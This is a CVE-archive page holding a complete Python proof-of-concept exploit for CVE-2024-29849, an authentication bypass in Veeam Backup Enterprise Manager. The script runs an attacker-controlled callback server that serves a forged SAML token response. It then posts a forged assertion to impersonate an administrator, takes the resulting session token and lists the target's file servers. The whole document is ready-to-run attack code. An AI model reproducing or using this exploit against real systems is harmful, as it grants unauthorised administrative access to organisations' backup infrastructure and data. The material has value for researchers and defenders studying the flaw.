4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-29849.py PY
"""
Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
Technical details: https://summoning.team/blog/veeam-enterprise-manager-CVE-2024-29849-auth-bypass/
"""


banner = r"""
 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                    
        (*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849) 
        
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
        
        (*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/
        
        """

""""""

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import warnings
import base64
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
import ssl
from urllib.parse import urlparse
import requests
import ssl
import OpenSSL
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from urllib.parse import urlparse
from threading import Thread
import os

print(banner)
parser = argparse.ArgumentParser(usage=r'python CVE-2024-29849.py --target https://192.168.253.180:9398 --callback-server 192.168.253.1:443')
parser.add_argument('--target', '-t', dest='target', help='Target IP and port (e.g: https://192.168.1.1:9398)', required=True)
parser.add_argument('--callback-server', '-s', dest='callback_server',  help='Callback server for authentication bypass', required=True)
parser.add_argument('--domain-name', '-d', dest='domain_name', help='target domain name',default=None, required=False)
parser.add_argument('--target-user', '-u', dest='target_user', help='username to impersonate',default='administrator', required=False)
args = parser.parse_args()
args.target = args.target.rstrip('/')

class CustomHandler(SimpleHTTPRequestHandler):
    def do_POST(self):
        xml_response = '''<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soap:Body>
    <RequestSecurityTokenResponse xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">
      <TokenType>urn:oasis:names:tc:SAML:2.0:assertion</TokenType>
      <Status>
        <Code>http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid</Code>
      </Status>
    </RequestSecurityTokenResponse>
  </soap:Body>
</soap:Envelope>
'''

        self.send_response(200)
        self.send_header("Content-type", "text/xml")
        self.end_headers()
        self.wfile.write(xml_response.encode("utf-8"))
        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")
        
        

def start_callback_server(ip, port):
    global server_ready
    # openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
    httpd = HTTPServer((ip, port), CustomHandler)
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")
    httpd.socket = ssl_context.wrap_socket(
        httpd.socket,
        server_side=True,
    )
    print(f"(*) Callback server listening on https://{ip}:{port}")
    
    server_ready = True
    httpd.serve_forever()
    
def get_cn_from_cert(target):
    parsed_url = urlparse(target)
    hostname = parsed_url.hostname
    domain_name = None
    if parsed_url.port == None:
        parsed_url.port = 443

    print(f"(*) Fetching certificate for {hostname}")
    try:
        cert = ssl.get_server_certificate((hostname, int(parsed_url.port)))
    except Exception as e:
        print(f"(!) Could not fetch certificate: {e}")
        return None

    x509_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
    crypto_cert = x509.load_pem_x509_certificate(cert.encode(), default_backend())

    cn = None
    for attribute in crypto_cert.subject:
        if attribute.oid == x509.NameOID.COMMON_NAME:
            cn = attribute.value
            break
    if cn != None:
        print(f"(*) Common Name (CN) extracted from certificate: {cn}")
        domain_name = f"{cn.split(".")[-2]}.{cn.split(".")[-1]}"
        print(f"(*) Assumed domain name: {domain_name}")
        answer = input("(?) Is the assumed domain name correct(Y/n)?")
        if answer.lower() == "y":
            return domain_name
        else:
            domain_name = input("(*) Enter the correct domain name: ")
            return domain_name

def sanity_check_target(target):
    try:
        r = s.get(f"{target.rstrip('/')}/api/", verify=False)
    except Exception as e:
        print(f"(!) Could not reach the target: {e}")
        exit(1)

    if "www.veeam.com/ent/v1.0" not in r.text:
        print("(!) The target does not seem to be a Veeam Backup Enterprise Manager")
        exit(1)

    print(f"(*) Target {target} is reachable and seems to be a Veeam Backup Enterprise Manager")
    

def sanity_files():
    if not os.path.exists("server.pem") or not os.path.exists("key.pem"):
        print("(!) server.pem or key.pem not found, please generate them using the following command:")
        print("openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes")
        exit(1)    

def sanity_check_callback_server(callback_server):
    while not server_ready:
        pass
    counter = 5
    while counter:
        try:
            r = s.get(f"https://{callback_server}/", verify=False)
            counter = 0
                
        except Exception as e:
            print(f"(*) Checking callback server")
            counter -= 1
    
    if r == None:
        print(f"(!) Could not reach the callback server {callback_server}")
        exit(1)
    print(f"(*) Callback server {callback_server} is reachable")



def exploit(target_user):
    print(f"(*) Triggering malicious SAML assertion to {args.target}")
    print(f"(*) Impersonating user: {target_user}")
    try:
        xml_b64_body = base64.b64encode(f'''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"><saml2:Issuer>https://{args.callback_server}/STSService</saml2:Issuer><saml2:Subject><saml2:NameID>{target_user}</saml2:NameID><saml2:SubjectConfirmation><saml2:SubjectConfirmationData NotOnOrAfter="2024-12-12T00:00:00Z" /></saml2:SubjectConfirmation></saml2:Subject><saml2:AuthnStatement AuthnInstant="2024-06-01T00:00:00Z"><saml2:AuthnContext><saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2:AuthnContext></saml2:AuthnStatement><saml2:AttributeStatement><saml2:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"><saml2:AttributeValue></saml2:AttributeValue></saml2:Attribute><saml2:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name"><saml2:AttributeValue></saml2:AttributeValue></saml2:Attribute></saml2:AttributeStatement></saml2:Assertion>'''.encode('utf-8')).decode('utf-8')
        r = s.post(f"{args.target.rstrip('/')}/api/sessionMngr/?v=latest", headers={"Content-type":"application/json"},  json={"VMwareSSOToken": xml_b64_body})
    except Exception as e:
        print(f"(!) Could not send the malicious SAML assertion to {args.target}")
        print(e)
        exit(1)
    if(r.status_code != 201):
        print(f"(!) Exploit failed, result was: {r.text}")
        print(r)
        exit(1)
    if(r.headers['X-Restsvcsessionid'] != None):
        print(f"\n(+) Exploit was Successful, authenticated as {target_user}")
        print(f"(*) Got token: {r.headers['X-Restsvcsessionid']}")

    return r.headers['X-Restsvcsessionid']

def post_exploit(token):
    print("(*) Starting post-exploitation phase")
    print("(*) Retrieving the list of file servers")
    r = s.get(f"{args.target.rstrip('/')}/api/nas/fileServers?format=Entity", verify=False, headers={"Accept":"application/json","Content-Type":"application/json","X-Restsvcsessionid":token})
    try:
        print(r.json())
    except:
        print(r.text)


s = requests.Session()
s.verify = False
server_ready = False
sanity_files()
sanity_check_target(args.target)
if(args.domain_name == None):
    args.domain_name = get_cn_from_cert(args.target)
print(f"(*) Target domain name is: {args.domain_name}")
args.target_user = f"{args.target_user}@{args.domain_name}"
print("(*) Starting callback server")
print("\n(^_^) Prepare for the Pwnage (^_^)\n")
callback_server_thread = Thread(target=start_callback_server, args=(args.callback_server.split(":")[0], int(args.callback_server.split(":")[1]),))
callback_server_thread.setDaemon(True)
callback_server_thread.start()
sanity_check_callback_server(args.callback_server)
pwned_token = exploit(args.target_user)
post_exploit(pwned_token)